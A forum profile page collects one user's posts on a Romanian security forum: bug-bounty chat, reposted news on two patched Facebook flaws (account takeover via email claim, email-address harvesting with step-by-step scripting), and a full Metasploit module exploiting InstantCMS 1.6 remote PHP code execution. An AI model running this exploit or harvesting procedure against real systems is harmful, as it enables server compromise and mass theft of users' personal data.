Jump to content

akkiliON

Active Members
  • Posts

    1202
  • Joined

  • Last visited

  • Days Won

    61

Everything posted by akkiliON

  1. Dev - C Programming Language 6 37.50% Dev - Practical C Programming 6 37.50% Hack - The Basics Hacking Penetration Testing 6 37.50%
  2. La ce te referi mai exact ? Doresti link-ul cu lista ? // http://support.apple.com/kb/HT1318 Uite aici lista. Pai am gasit un xss in support si un path disclosure in developer.
  3. M? bucur c? sunte?i ferici?i. Ajut comunitatea cu ce pot
  4. Thanks to all
  5. Salut tuturor. Scuze c? am creat acest topic inutil ! Doar vreau s? v? anun? c? am fost ad?ugat în Hall of Fame la Apple. P.S: Nu vreau s? m? laud cu asta Am vrut s? fac o mic? reclam? la RST ! Si din câte v?d se pare c? mai avem un membru de aici in HoF ! V? mul?umesc pentru aten?ie !
  6. OFF: L-am f?cut m? ! http://img835.imageshack.us/img835/8215/1hcx.jpg
  7. Security expert Dan Melamed discovered a critical vulnerability in Facebook platform that allow an attacker to take complete control over any account. The vulnerability is considered critical because it would allow a hacker to hack potentially any Facebook account. Dan Melamed presented the discovery on his blog. Dan demonstrated that how a hacker can reset the victim's account password just by tricking him to visit a malicious exploit code. The flaw affects the Facebook "claim email address" component. When an user tries to add an email address already registered to Facebook platform, he has the option to "claim it"". The loophole exists here, when user claim an email address, Facebook did not check from whom the request came from. This allows an email to be claimed on any Facebook account. The exploit is possible provided that: An existing account having the email address that the attacker wants to claim. Another existing account to initiate the claim process. Dan provided a video of proof of concept: When user makes a claim request for an @hotmail.com email he is taken to a link that appears like this: https://www.facebook.com/support/openid/proxy_hotmail.php?appdata[fbid]=AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs The researcher discovered that the parameter appdata[fbid] was the encrypted email address. Dan used the encrypted email funnyluv196@hotmail.com for the POC. The link will redirect user to the sign in page for Hotmail. You must sign in with the email address that matches the encrypted parameter. Once signed in, you are taken to a final link that looks like this: https://www.facebook.com/support/openid/accept_hotmail.php?appdata=%7B%22fbid%22%3A%22AQ3T cly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs%22%7D&code=a6893043-cf19-942b-c686-1aadb8b21026 The source code confirms that the claim email process has succeeded: Dan Melamed sustains that the exploit is very simple to conduct and it is advantaged by 2 important aspects: The link expires in around 3 hours, giving plenty of time for a hacker to use it. It can be visited on any Facebook account because there is no check to see who made this request. To trick the victim, hacker has just to insert the (http://evilsite.com/evilpage.html) exploit link on a webpage as either an image or an iframe. Once clicked, the email (in this case: funnyluv196@hotmail.com) is instantly added to their Facebook account. The victim does not receive any notification whatsoever that this email has been added. The hacker can then reset the victim's password using the newly added email address. Thus allowing the attacker to take complete control over the Facebook account. This vulnerability has been confirmed to be patched by the Facebook Security Team, fortunately the group is very responsive as demonstrated for the fix of other recent flaw. It must be considered that the popular social networking platform is very attractive for cybercrime and many other categories of attackers, cyber security is a critical aspect for its business success. Vulnerability allows Hacking Facebook account and password reset within a minute -TheHackerNews
  8. Mai mult ca sigur cel din facebook e in apps ! Iar in Google ... greu de crezut Trebuie sa stai ore bune ca sa gasesti un xss in google si in facebook.
  9. When you sign up on Facebook, you have to enter an email address and that email address becomes your primary email address on Facebook. In a recent disclosure by a Security researcher, Stephen Sclafani - The Social Networking site Facebook was vulnerable to disclosure of primary email address of any Facebook user to hackers and spammers. The flaw resides in the invitation mechanism of Facebook, using which one can invite his all contacts emails to Facebook for making new account. As shown in following screenshot, an invitation received on an email, where one need to click the Signup URL: After clicking that URL, invited user will be redirected to a signup page filled in with the email address and the name of a person who used the link to sign up for an account was displayed: There are two parameters in this URL, i.e “re” and “mid”. According to Stephen changing some part of "mid" parameter can expose the email address of another user. http://www.facebook.com/r.php?re=245bf2da75118af20d917bdd34babddb&mid=59b63aG5af3107aba69G0G46 59b63a G 5af3107aba69 G 0 G 46 He explained that, in above string, “G“ acting as a delimiter/separator, where 2nd value after first “G“ i.e 5af3107aba69 is the Profile ID of user. Replacing user ID can give expose email ID of any user in Sign Up Page. Attacker can obtain this numerical ID of facebook profile from Graph API. Using this flaw attacker can extract email address of all facebook profiles for spamming or hacking purpose. Attacker need to just write an automated script/code to grab all email address of billions of facebook users. Using following steps hacker can write a automated code to grab all emails: 1.) Grab profile links of all facebook users from Facebook People Directory i.e A A | azusa sakata | Director de persoane | Facebook 2.) Collect Numerical Facebook ID for each Profile from facebook Graph API i.e The Hacker News 3.) In Next step, using curl or other methods open the modified URL for each profile ie http://www.facebook.com/r.php?re=245bf2da75118af20d917bdd34babddb&mid=59b63aG1251386282G0G46 4.) Filter the email address exposed in the Source code obtained from above step for each profile and store in database. This way, above vulnerability was able to put every facebook user at Risk, but Stephen's responsible disclosure to Facebook Security team save us. He is rewarded with $3,500 for helping them to patch this flaw. Vulnerability in Facebook discloses Primary Email Address of any account - TheHackerNews
  10. Se pare c? e?ti cu mine pe list? Bravo !
  11. Multumesc de informatii
  12. De exemplu tu ai primit sa zicem 375 $ si ii scoti in LEI . Ei dupa ce curs valutar se iau ? Daca intelegi ce vreau sa zic Poate .... nu stiu sigur ... dar daca in caz primesc ceva vreau sa fiu lamurit cum sta treaba Am raportat 2 xss-uri ! // Nu ma las pana nu primesc macar odata bani de la ei
  13. Auzi cum primiti banii voi in ce valuta ii scoateti ? Dolari sau Lei ? Felicitari Mai trebuie sa primesti inca 375 $ ?
  14. Mda ... sa vedem Sunt curios si eu !
  15. nuuuuuuuu )
  16. # Exploit: *.paypal.com - Cross-Site-Scripting Reflected # Author: akkiliON # Target: Paypal # Status: Waiting for an response # PoC:
  17. Pacat ca mah_one a raportat vulnerabilitatea aia care putea sa stearga orice cont ) Te scapa de datorii )
  18. Poate o sa iti zica duplicate cum mi-a zis mie ! Am gasit 4 xss-uri ... 2 /domeniu & 2 /alte site-uri ... si nu am primit nimic ! Sunt jegosi ! Nu se merita sa mai cauti nimic la ei Sper sa primesti
  19. Cu ce scop ai dat site-ul jos ?
  20. http://www.schubergphilis.com/newsroom/library/downloads-policies/responsible-disclosure-policy/
  21. require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'InstantCMS 1.6 Remote PHP Code Execution', 'Description' => %q{ This module exploits an arbitrary php command execution vulnerability, because of a dangerous use of eval(), in InstantCMS versions 1.6. }, 'Author' => [ 'AkaStep', # Vulnerability discovery and PoC 'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'BID', '60816' ], [ 'URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html' ] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'InstantCMS 1.6', { } ], ], 'DisclosureDate' => 'Jun 26 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"]) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.to_s), 'vars_get' => { 'view' => 'search', 'query' => '${echo phpinfo()}' } }) if res if res.body.match(/Build Date/) return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end else return Exploit::CheckCode::Unknown end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout return Exploit::CheckCode::Unknown end def exploit print_status("Executing payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.to_s), 'vars_get' => { 'view' => 'search', 'query' => rand_text_alpha(3 + rand(3)), 'look' => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//" }, 'headers' => { 'Cmd' => Rex::Text.encode_base64(payload.encoded) } }) end end http://www.exploit-db.com/exploits/26622/
  22. XSS PERSISTENT ? Ala e 100 % XSS-ul lui florin ! // Edit: Epic
×
×
  • Create New...